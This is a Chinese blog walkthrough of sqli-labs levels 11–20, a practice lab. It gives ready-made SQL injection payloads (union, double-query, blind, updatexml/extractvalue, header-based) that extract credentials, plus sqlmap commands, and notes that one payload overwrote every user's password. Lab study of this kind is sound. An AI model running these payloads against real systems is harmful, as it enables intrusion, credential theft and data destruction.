Java教程

sqli-labs_Less11-20

本文主要是介绍sqli-labs_Less11-20,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
人生就是一场赌博,怕输的人永远赢不了。

Less-11

手工注入

1.开始为post类型的注入,先加个单引号,报错如下。

构造出SQL语句应该为:select username,password from users where username=' ' ' and password=' 2' limit 0,1; 也即是password字段被单引号包含了' and password=',导致 出现2' limit 0,1; 引号不匹配的情况。下图看起来更直观些。

2.所以,可构造如下语句:' # #把后面的都注释掉,然后在其前面加上自己构造的语句。
3.先用group by 看看有多少列:' group by 1 ,经过测试,共2个字段。

4.下面,开始使用联合查询:-1' union select 1,2 #返回正常,开始构造语句。

5.查数据库名:' union select 1,database() #

6.接下来查表名,构造和Less-1类似:' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

7.查列名' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

8.查内容:' union select group_concat(username),group_concat(password) from security.users #

OK,已经得到想要的。

用sqlmap注入

1.首先,使用BurpSuite抓包,然后保存抓取到的内容。例如:保存为use.txt,把它放至某个目录下,这里为:F:/temp/use.txt

2.首先,判断是否存在SQL注入漏洞,python2 sqlmap.py -r F:/temp/use.txt - --batch 得到两个注入点,如图:

3.查询当前数据库python2 sqlmap.py -r F:/temp/use.txt - --batch --current-db

4.查询表::python2 sqlmap.py -r F:/temp/use.txt - --batch -D security --tables

5.剩下的查询和Less-1的用法一样,列-内容,一个一个爆即可。

Less-12

1.加单引号,正常,加双引号,报错:

由图可知,为双引号加括号闭合。
2.构造:") #返回正常,所以用Less-11构造的方法构造语句即可。即") 构造的语句 # 不在赘述。

Less-13

1.加单引号,报错,知道为单引号加括号闭合。

2.以为就这样了,结果采用上面的构造方法无用,看来没那么简单,应该使用双查询注入了,和Less-5的构造基本相同。
3.查数据库,构造如下。') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#

继续爆其他数据库名,改变limit n,1即可。
4.查表:') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#

同样,改变limit n,1即可。
5.查列名:') or (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) #

同样,改变limit n,1即可。
6.查内容:') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#

同样,改变limit n,1即可。

Less-14

1.加单引号,正常,加双引号,报错,可知为双引号闭合。

2.应该不会直接是联合查询了,一试,果然还是双查询注入。
3.构造:" 构造语句 # 构造语句和less-13一样。

Less-15

1.加单引号,只有“报错”,应该是要盲注,而且只能布尔型或时间型了(只知道错了没压根不知道错的信息)

2.不管,先把注入句式试出来,用万能句型' or 1=1 or '1'='2,经过尝试,为单引号闭合,此时登录成功。

3.开始布尔型盲注:构造' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2,其实就是把上面的1=1改成我们想要的语句,即先看看数据库版面是否为5。因为显示登录成功,所以说明1=(if(substr(version(),1,1)=5,1,0))为true。
4.继续构造:都是把构造好的语句替换1=1,从而查看结果。构造和Less-6差不多,不再赘述。

Less-16

1.还是用万能句型试,最终试出为双引号加括号闭合,即使用") or 1=1 or "1"=("2登录成功。
2.接下来的构造和Less-15一样,如") or 1=(if(substr(version(),1,1)=5,1,0)) or '1'=("2

Less-17

1.进入页面提示为PASSWORD RESET,即重置密码界面,坑比较多。
2.首先,在user name中尝试了多次,都是让走开,后来一想,确实该走,都提示为重置密码了,还傻傻地在user name试,应该在new password中想办法。后来看了其他大佬的博客后,查看源码才知道原来对user name表单进行了过滤:

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  
$passwd=$_POST['passwd'];
function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}
		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}
		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	        else
		{
		$value = intval($value);
		}
	return $value;

函数check_input()的作用就是检查用户输入,并将用户输入安全化,其中的mysql_real_escape_string()会在\x00, \n, \r, \, ', " and \x1a这些字符前加入反斜线进行转义,防止注入,而且这个函数也避免了宽字节注入的危险。

3.当然,还不止,new password也不是和之前一样轻易试出注入类型,因为有user name的限制,如果new password不对,那么怎么试都自然是错的。因为看了大佬的解题思路,知道了为单引号闭合,SQL语句为:@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";且知道有用户名为admin(这个用户名一般都有)。所以就直接考虑构造了。

4.首先考虑到不能回显有意义的信息,所以首选前面一直用的双注入查询 构造如下:user name:admin ,而new password:' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#

剩下的构造不多说,和Less-13一样,一个一个爆就好。
5.在这里,尝试使用一种新的注入方法,基于extractvalue()updatexml()的报错注入,详情请看: 学习基于extractvalue()和updatexml()的报错注入,同时,下面的注入丢默认user name:admin
6.先使用updatexml()进行注入,构造为' and updatexml(1,concat('~',(select version())),1)# 获取相应版本:

获取数据库名称:' and updatexml(1,concat('~',(select database())),1)#

获取表名:' and updatexml(1,concat('~',(select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),1)#

改变limit n,1即可获取其他表名。

获取列名:' and updatexml(1,concat('~',(select concat(column_name,';') from information_schema.columns where table_name='emails' limit 0,1)),1)#

同样,改变limit n,1即可。

获取内容:这样,不行' and updatexml(1,concat('~',(select concat(username,';',password) from information_schema.tables where table_name='security' limit 0,1)),1)# 报错如下:

这样:也不行' and updatexml(1,concat('~',(select concat(username,';',password) from security.users limit 0,1)),1)# 报错如下:

这样:发现可以了,但是password成了0,一下子把所有的用户密码都改成了0,后面的可能就有问题了。' or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#

7.使用extractvalue(),和updatexml()十分相似,用法也差不多,甚至看起来跟直观些。构造:' and extractvalue(1,concat('~',(select version())))#

剩下的语句和updatexml()的类似。

Less-18

1.进入后显示Your IP ADDRESS is: ::1,输入常用的注入尝试,都只显示:

看来和上一题一样,都进行了相关的过滤。
2.实在不懂,先看一下源码:

if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);

这次对两个表单都进行过滤了。

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color="#FFFF00" font="" size="3">';
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color="#0000ff" font="" size="3">';			
			echo 'Your User Agent is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());			
			echo "<br><br>";
			echo '<img src="../images/flag.jpg">';
			echo "<br>";
			
			}
		else
			{
			echo '<font color="#0000ff" font="" size="3">';
			//echo "Try again looser";
			print_r(mysql_error());
			echo "<br>";			
			echo "<br>";
			echo '<img src="../images/slap.jpg">';	
			echo "</font>";  
			}

看到只有用户再登陆成功后才会显示用户的user agent,并且将uagent, ip_address, username插入到了uagents表中。查看一下:

注意到:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
 

在插入过程中并没有进行过滤,由此可知,可以从uagent下手。本来ip_address也可以成功的,但是源码中显示被注释掉了,回显的只能是用户的user agent
3.构造uagent的内容,使用BurpSuite对提交内容进行抓包,然后再修改相应的User-Agent:

4.易知,只要保证User-Agent:字段内容,即uagent保持单引号闭合,且使用双查询注入或使用extractvalue()updatexml()构造相应语句即可(因为是在插入语句中,只能通过报错获取我们想要的信息)。
5.构造语句查询数据库名:
构造一:' and updatexml(1,concat('~',(select database())),1) and '1'='1

构造二:' and extractvalue(1,concat('~',(select database()))) and '1'='1

构造三:' and (select 1 from (select count(*),concat(database(),';',floor(rand()*2)) as x from information_schema.tables group by x)as a) and '1'='1

6.其他构造和之前的相似,不再赘述。

Less-19

  1. 提示为Referer,直接用我们知道的用户名密码都为:admin的进行尝试,发现:

2.也就是说我们需要将构造语句放入Referer: 尝试:' and extractvalue(1,concat('~',(select database()))) and '1'='1

成功,知道方法就好了。

Less-20

1.提示为Cookie,直接用我们知道的用户名密码都为:admin的进行尝试,发现:

2.Cookie为:uname = admin 所以构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #

3.构造还是一样的。

目前就先到这吧,这部分的题目都是post类型的,后面好像还有,但还是放下一篇吧。当然,文中如有错误或其他更好的语句或解法,还希望诸位不吝赐教,多谢。

参考:

  1. 学习基于extractvalue()和updatexml()的报错注入
  2. SQL注入新手教程(讲的很好的内容,之前没发现,现在才看到)
  3. It is not safe to rely on the the system's timezone settings解决方法
这篇关于sqli-labs_Less11-20的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!